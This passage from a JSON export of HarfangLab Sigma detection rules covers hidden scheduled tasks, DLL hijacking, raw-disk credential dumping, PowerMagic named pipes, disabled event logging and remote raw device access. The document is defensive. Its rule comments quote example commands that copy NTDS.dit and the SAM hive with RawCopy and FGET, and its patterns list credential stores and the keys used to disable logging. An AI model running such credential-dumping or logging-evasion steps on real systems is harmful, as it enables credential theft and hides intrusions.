"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1557.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aad46f4b-8e71-412f-bea5-fa2d12a23f66",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623108Z",
"creation_date": "2026-03-23T11:45:34.623111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623115Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_suspicious_hidden_scheduled_task.yml",
"content": "title: Suspicious Hidden Scheduled Task Created\nid: aad46f4b-8e71-412f-bea5-fa2d12a23f66\ndescription: |\n Detects the creation of a hidden scheduled task by a suspicious process.\n This technique is commonly used by attackers to hide the presence of a scheduled task.\n It is recommended to investigate the source of the scheduled task creation and review the task content and command-line for malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/11/07\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.lateral_movement\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType: 'create'\n TaskHidden: 'true'\n ProcessImage|contains: '?'\n\n filter_signed:\n ProcessSigned: 'true'\n\n filter_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_legitimate_target:\n TaskCommands|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_pdf_creator:\n ProcessImage: 
'?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*.tmp\\pdf*_creator_update.tmp'\n\n exclusion_genericupdater:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\bin\\updater.exe'\n TaskName|startswith: '\\\\*User\\\\*Updater\\\\*UpdaterTaskUser'\n\n exclusion_viota:\n ProcessImage|endswith: '\\Viota Database Update Tool\\ViotaDatabaseUpdateTool*.exe'\n TaskName: '\\\\*Viota Database Update Tool_ViotaDatabaseUpdateTool*.exe'\n\n exclusion_fresenius_kabi:\n ProcessImage|endswith: '\\Vigilant Master Med Device Uploader.exe'\n TaskName: '\\\\{????????-????-????-????-????????????}'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aad46f4b-8e71-412f-bea5-fa2d12a23f66",
"rule_name": "Suspicious Hidden Scheduled Task Created",
"rule_description": "Detects the creation of a hidden scheduled task by a suspicious process.\nThis technique is commonly used by attackers to hide the presence of a scheduled task.\nIt is recommended to investigate the source of the scheduled task creation and review the task content and command-line for malicious activity.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aaed74be-3771-4ce8-82e7-f04d9c90c5f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080827Z",
"creation_date": "2026-03-23T11:45:34.080829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdmagent.yml",
"content": "title: DLL Hijacking via MDMAgent.exe\nid: aaed74be-3771-4ce8-82e7-f04d9c90c5f3\ndescription: |\n Detects potential Windows DLL Hijacking via MDMAgent.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MDMAgent'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dmenrollengine.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aaed74be-3771-4ce8-82e7-f04d9c90c5f3",
"rule_name": "DLL Hijacking via MDMAgent.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MDMAgent.exe.\nDLL hijacking takes advantage of the default Windows DLL search order: a legitimate application and a malicious DLL carrying the name of one of its dependencies are placed side by side, so the application loads the attacker's library instead of the system one.\nAttackers use this technique by copying a legitimate, Microsoft-signed executable to a non-standard directory (outside System32, SysWOW64 or WinSxS) and planting the malicious DLL within the same folder; loads of libraries from those system directories, or of libraries signed by Microsoft Windows, are excluded by the rule.\nIt is recommended to investigate the loaded library (signature, origin, creation time) for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aaf113bc-6b63-46d3-919a-9b2a105bcd5f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071165Z",
"creation_date": "2026-03-23T11:45:34.071167Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071171Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/jschicht/RawCopy",
"http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html",
"https://attack.mitre.org/techniques/T1006/",
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1003/003/"
],
"name": "t1006_raw_access_sensitive_files.yml",
"content": "title: Sensitive Files Accessed via Raw Device Access\nid: aaf113bc-6b63-46d3-919a-9b2a105bcd5f\ndescription: |\n Detects the access to sensitive files via raw disk access through tools like RawCopy or FGET.\n Attackers can dump sensitive files via raw disk access to evade detection mechanisms or to bypass locked files.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/003/\ndate: 2022/10/19\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n condition: 1 of selection_* and 
sensitive_files\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aaf113bc-6b63-46d3-919a-9b2a105bcd5f",
"rule_name": "Sensitive Files Accessed via Raw Device Access",
"rule_description": "Detects access to sensitive files via raw disk access through tools like RawCopy or FGET.\nThese tools read the NTFS volume at a low level, which bypasses the file locks and ACLs protecting files such as NTDS.dit and the SAM, SECURITY and SYSTEM registry hives and can evade file-access monitoring; the extracted copies can then be processed offline to recover credentials.\nIt is recommended to investigate the parent process and the destination path of the copy, and to treat the credentials stored in the copied files as potentially compromised.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ab33962d-497b-42af-9f9a-0096d48d2791",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606726Z",
"creation_date": "2026-03-23T11:45:34.606729Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/bad-magic-apt/109087/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_powermagic_named_pipes_created.yml",
"content": "title: PowerMagic Malware Named Pipes Created\nid: ab33962d-497b-42af-9f9a-0096d48d2791\ndescription: |\n Detects the creation of a Named Pipe pertaining to the PowerMagic malware.\n PowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\n Adversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\n It is recommended to analyze actions taken by the process creating the named pipe and isolate infected systems if necessary.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/03/24\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.PowerMagic\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\PipeMd'\n - '\\PipeCrDtMd'\n - '\\PipeDtMd'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ab33962d-497b-42af-9f9a-0096d48d2791",
"rule_name": "PowerMagic Malware Named Pipes Created",
"rule_description": "Detects the creation of a Named Pipe pertaining to the PowerMagic malware.\nPowerMagic is a Russian-developed espionage malware that uses named pipes to communicate locally between its different components.\nAdversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\nBecause the rule matches on the pipe names alone, the creating process should be confirmed as malicious before escalating.\nIt is recommended to analyze actions taken by the process creating the named pipe and isolate infected systems if necessary.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ab699571-31ab-4f50-b1cf-ec688a7ffea1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586522Z",
"creation_date": "2026-03-23T11:45:34.586526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586534Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dxpserver.yml",
"content": "title: DLL Hijacking via dxpserver.exe\nid: ab699571-31ab-4f50-b1cf-ec688a7ffea1\ndescription: |\n Detects potential Windows DLL Hijacking via dxpserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxpserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\msi.dll'\n - '\\PROPSYS.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ab699571-31ab-4f50-b1cf-ec688a7ffea1",
"rule_name": "DLL Hijacking via dxpserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dxpserver.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder; loads from System32, SysWOW64 or WinSxS, and libraries signed by Microsoft Windows, are excluded by the rule.\nIt is recommended to investigate the loaded library (signature, origin, creation time) for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ab743be0-3d7d-4e52-9134-5b3fc6ca87f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624624Z",
"creation_date": "2026-03-23T11:45:34.624626Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624630Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1562/002/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_002_autologger_sessions_disabled.yml",
"content": "title: AutoLogger Session Disabled\nid: ab743be0-3d7d-4e52-9134-5b3fc6ca87f8\ndescription: |\n Detects Windows Event sources such as EventLog and Defender being disabled via registry.\n Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.\n It is recommended to investigate the process responsible for the registry modification to determine its legitimacy and to analyze possible malicious actions following this alert.\nreferences:\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1562/002/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/09/06\nmodified: 2025/12/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-*\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\Defender*\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-*\\{????????-????-????-????-????????????}\\Enabled'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\Defender*\\{????????-????-????-????-????????????}\\Enabled'\n Details: 'DWORD (0x00000000)'\n\n exclusion_defender:\n - ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n - ProcessImage: '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessParentImage: '?:\\WINDOWS\\system32\\services.exe'\n\n exclusion_tiworker:\n TargetObject:\n - 
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application\\{????????-????-????-????-????????????}\\Enabled'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System\\{????????-????-????-????-????????????}\\Enabled'\n ProcessCommandLine:\n - '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - '?:\\WINDOWS\\winsxs\\x86_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_wevtutil:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application\\{????????-????-????-????-????????????}\\Enabled'\n ProcessCommandLine|contains:\n - 'wevtutil.exe * ?:\\WINDOWS\\system32\\drivers\\\\*.man'\n - 'wevtutil.exe * ?:\\ProgramData\\\\*.man'\n - 'wevtutil.exe * ?:\\Program Files\\\\*.man'\n - 'wevtutil.exe * ?:\\Program Files (x86)\\\\*.man'\n - 'wevtutil.exe * ?:\\WindowsAzure\\GuestAgent_*\\AzureEvents.man'\n - 'wevtutil.exe * ?:\\WindowsAzure\\Packages_*\\AzureEvents.man'\n - 'wevtutil.exe * ?:\\WindowsAzure\\Packages\\GuestAgent\\AzureEvents.man'\n\n exclusion_sentinelone:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System\\{????????-????-????-????-????????????}\\Enabled'\n ProcessCommandLine: '?:\\Windows\\system32\\wevtutil.exe install-manifest ?:\\Windows\\system32\\drivers\\SentinelOne\\\\*\\SentinelMessages.man'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ab743be0-3d7d-4e52-9134-5b3fc6ca87f8",
"rule_name": "AutoLogger Session Disabled",
"rule_description": "Detects Windows AutoLogger ETW sessions such as the EventLog-* sessions and the Defender* sessions being disabled via the registry, by setting either the session's Start value or one of its providers' Enabled value to 0.\nAdversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.\nKnown legitimate modifications by Windows Defender (MsMpEng.exe), by the servicing stack (TiWorker.exe) and by manifest installation through wevtutil.exe are excluded.\nIt is recommended to investigate the process responsible for the registry modification to determine its legitimacy, to restore the session if the change was not authorized, and to analyze possible malicious actions following this alert.\n",
"rule_creation_date": "2024-09-06",
"rule_modified_date": "2025-12-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abaa5c6c-d4cb-43c4-a0cb-af78f30bbc52",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097176Z",
"creation_date": "2026-03-23T11:45:34.097178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097182Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/al3x_n3ff/status/1947692990874718377",
"https://github.com/Pennyw0rth/NetExec/blob/main/nxc/data/ntds-dump-raw/ntds-dump-raw.ps1",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_remote_raw_device_access_via_powershell.yml",
"content": "title: Remote Raw Device Access via Powershell\nid: abaa5c6c-d4cb-43c4-a0cb-af78f30bbc52\ndescription: |\n Detects a remote raw device access using PowerShell.\n Accessing raw devices on a remote computer using PowerShell is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\n This kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\n If abused, it can lead to privilege escalation, credential theft, or complete system compromise.\n It is recommended to check the PowerShell script linked to the process and pivot on the source IP for suspicious activities.\nreferences:\n - https://x.com/al3x_n3ff/status/1947692990874718377\n - https://github.com/Pennyw0rth/NetExec/blob/main/nxc/data/ntds-dump-raw/ntds-dump-raw.ps1\n - https://attack.mitre.org/techniques/T1006/\ndate: 2025/07/23\nmodified: 2025/10/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - classification.Windows.Source.RawDeviceAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: raw_device_access\ndetection:\n selection:\n Device: '\\Device\\Harddisk?\\DR?'\n ProcessProcessName:\n - 'Powershell.exe'\n - 'wsmprovhost.exe'\n - 'winrshost.exe'\n\n selection_remote_thread:\n SessionLogonType: 3 # Network Session\n\n selection_remote_proc:\n ProcessSessionLogonType: 3 # Network Session\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abaa5c6c-d4cb-43c4-a0cb-af78f30bbc52",
"rule_name": "Remote Raw Device Access via Powershell",
